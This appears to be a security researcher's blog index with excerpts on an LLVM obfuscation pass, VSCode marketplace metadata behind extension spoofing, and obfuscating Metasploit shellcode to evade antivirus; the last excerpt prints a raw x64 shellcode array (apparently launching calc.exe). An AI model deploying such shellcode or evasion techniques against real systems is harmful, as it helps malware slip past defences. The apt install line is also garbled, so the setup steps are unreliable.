wubba lubba dub dub.

Learning to write a LLVM Pass for Code Obfuscation #1

post @ 2026-06-07

This series of blogs is supposed to document my learning journey from a C/gcc nerd to a C++/LLVM chad. Expect this blog to be very informal, with the occasional rant, but it will document everything that I have learnt, including C++ internals, gimmicks, LLVM quirks and other references.

Setup

First thing first, we need to do some basic setup, starting with fetching the source code for the LLVM project:

1
git clone https://github.com/llvm/llvm-project.git

At the time of writing this, the latest commit is 8aafa50c7a2dfb8ca1d5cdf8980f7f2d259779f5 - incase you wanna follow along the exact version and stuff, just do:

1
git checkout 8aafa50c7a2dfb8ca1d5cdf8980f7f2d259779f5

Next, we install some basics with:

1
sudo apt -y ninja-build install build-essential subversion cmake python3-dev libncurses5-dev libxml2-dev libedit-dev swig doxygen graphviz xz-utils clang gdb git vim tmux

I would recommend running everything in a tmux session because some of these compilations take a while. That being said, let’s talk about LLVM (while my code compiles in the background).

Why LLVM?

Read More

VVhich Extension?

post @ 2026-03-16

While preparing for my talk at Insomni Hack and reviewing the sinister-vsix project, I wondered: “Hey, how does VSCode fetch the metadata for these extensions?”. Just a small recap, during the Task#4 - we spoofed a Microsoft Published Extension.

However, upon examining the extension code, I noticed a couple of things:

  • Metadata like stars, download count, etc wasnt stored in the source code (which made sense)
  • “Where is the blue tick coming from?”

So, I decided to take a deeper look. This blog documents the result of the research done quickly at an airport while I am on my way to present my fully finished 100+ slides deck(boy oh boy do I have to change those!) - but hopefully it’s not tooo incohorent.

VVhere is the metadata coming from?

First, we go searching for the source of the metadata. A bit of poking around later, I found that VSCode made a POST request to the marketplace API as such:

1
2
3
4
5
6
7
8
9
10
11
12
13
curl -X POST "https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery" -H "Content-Type: application/json" -H "Accept: application/json;api-version=7.2-preview" -H "User-Agent: VSCode" -d '{
    "filters": [{
      "criteria": [
        { "filterType": 7, "value": "ms-vscode.live-server" }
      ],
      "pageSize": 1,
      "pageNumber": 1,
      "sortBy": 0,
      "sortOrder": 0
    }],
    "assetTypes": [],
    "flags": 950
  }'

The only thing to note here is the value parameter which is set to ms-vscode.live-server (this is always set to extension_publisher:extension_name). On issuing this request, we get a big response, which (after prettifying) looks like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
{
  "results": [
    {
      "extensions": [
        {
          "publisher": {
            "publisherId": "5f5636e7-69ed-4afe-b5d6-8d231fb3d3ee",
            "publisherName": "ms-vscode",
            "displayName": "Microsoft",
            "flags": "verified",
            "domain": "https://microsoft.com",
            "isDomainVerified": true
          },
          "extensionId": "4eae7368-ec63-429d-8449-57a7df5e2117",
          "extensionName": "live-server",
          "displayName": "Live Preview",
          "flags": "validated, public, preview",
          "lastUpdated": "2026-02-09T09:27:53.193Z",
          "publishedDate": "2021-06-21T20:33:59.11Z",
          "releaseDate": "2021-06-21T20:33:59.11Z",
          "shortDescription": "Hosts a local server in your workspace for you to preview your webpages on.",
          "versions": [
            {
              "version": "0.5.2026020901",
              "flags": "validated",
              "lastUpdated": "2026-02-09T09:27:53.193Z",
              "files": [
                {
                    <a_bunch_of_stuff>
                }
              ],
              "properties": [
                    <a_bunch_of_github_links>
              ],
              "assetUri": "https://ms-vscode.gallery.vsassets.io/_apis/public/gallery/publisher/ms-vscode/extension/live-server/0.5.2026020901/assetbyname",
              "fallbackAssetUri": "https://ms-vscode.gallerycdn.vsassets.io/extensions/ms-vscode/live-server/0.5.2026020901/1770629024303"
            }
          ],
          "categories": [
            "Other"
          ],
          "tags": ["browser", "html", "live", "livepreview", "preview", "refresh", "reload"],
          "statistics": [
            {
              "statisticName": "install",
              "value": 11966368.0
            },
            {
              "statisticName": "averagerating",
              "value": 4.4358973503112793
            },
            {
              "statisticName": "ratingcount",
              "value": 78.0
            },
            {
              "statisticName": "trendingdaily",
              "value": 0.0022916290304234662
            },
            {
              "statisticName": "trendingmonthly",
              "value": 2.4470581465690677
            },
            {
              "statisticName": "trendingweekly",
              "value": 0.5461268883145507
            },
            {
              "statisticName": "updateCount",
              "value": 19214822.0
            },
            {
              "statisticName": "weightedRating",
              "value": 4.4381077195781415
            },
            {
              "statisticName": "downloadCount",
              "value": 53216.0
            }
          ],
          "deploymentType": 0
        }
      ],
      "pagingToken": null,
      "resultMetadata": [
        {
          "metadataType": "ResultCount",
          "metadataItems": [
            {
              "name": "TotalCount",
              "count": 1
            }
          ]
        }
      ]
    }
  ]
}
Read More

A Study in Obfuscation

post @ 2023-01-23

In this blog series, we explore how to obfuscate a Metasploit payload to avoid detection by Antivirus Engines and shall try to go invisible.

We would employ known techniques and see how they affect detection rates uploading the compiled executable to AntiScan as it does not submit the samples to the vendors.

Warning: Antiscan.me is no longer active so some links might be broken

Environment Setup

To begin with, we would be needing some tools and setup to get started. The first thing is the unobfuscated shellcode we’ll be using: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
RAW_PAYLOAD = [
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
    0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
    0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 
    0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 
    0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 
    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 
    0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 
    0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 
    0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 
    0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 
    0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 
    0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 
    0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 
    0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 
    0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 
    0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 
    0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 
    0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 
    0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 
    0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 
    0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 
    0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 
    0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
]

This will be our base from where we start. The raw, untampered shellcode is placed in scripts/obfuscator.py. The python file describes a class Obfuscator which takes our shell code and obfuscates it to various levels which is used as the payload in implant.cpp

Next up, we need to set up our development environment. For this, we need to install Visual Studio’s C/C++ Development Tools.

Once that is done, we can bring up any IDE of our choice and jump straight to coding. However, if you are using Visual Studio Code, I highly recommend having x64 Native Tools Command Prompt as your default. One way of doing is to add the full path to VsDevCmd.bat to VS Code’s settings.json file as such:

1
2
3
4
5
6
7
8
9
10
{

    "workbench.colorTheme": "Default Dark+",
    "terminal.integrated.shell.windows": "cmd.exe",
    "terminal.integrated.shellArgs.windows": [
        "/k", "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvarsall.bat", "x64"
    ],
    "terminal.integrated.automationShell.windows": null,
    "explorer.confirmDelete": false,
}
Read More
⬆︎TOP